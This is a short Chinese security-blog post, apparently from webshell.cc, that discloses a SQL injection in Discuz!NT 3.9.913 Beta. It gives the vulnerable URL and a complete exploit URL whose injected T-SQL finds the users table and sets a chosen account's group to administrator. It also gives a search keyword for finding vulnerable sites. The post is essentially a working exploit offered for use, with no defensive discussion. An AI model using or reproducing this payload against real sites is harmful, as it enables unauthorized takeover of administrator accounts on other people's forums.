DNT存在SQL注入漏洞

分类:安全 | 2012-02-19 | 撸过 70 次
0人扯谈

注入地址:

http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1

利用:

http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27xxxxx%27%27%27%29--

关键字:Powered by Discuz!NT 3.9.913 Beta

本站内容均为原创,转载请务必保留署名与链接!
DNT存在SQL注入漏洞:https://www.webshell.cc/3123.html
标签: , ,

相关日志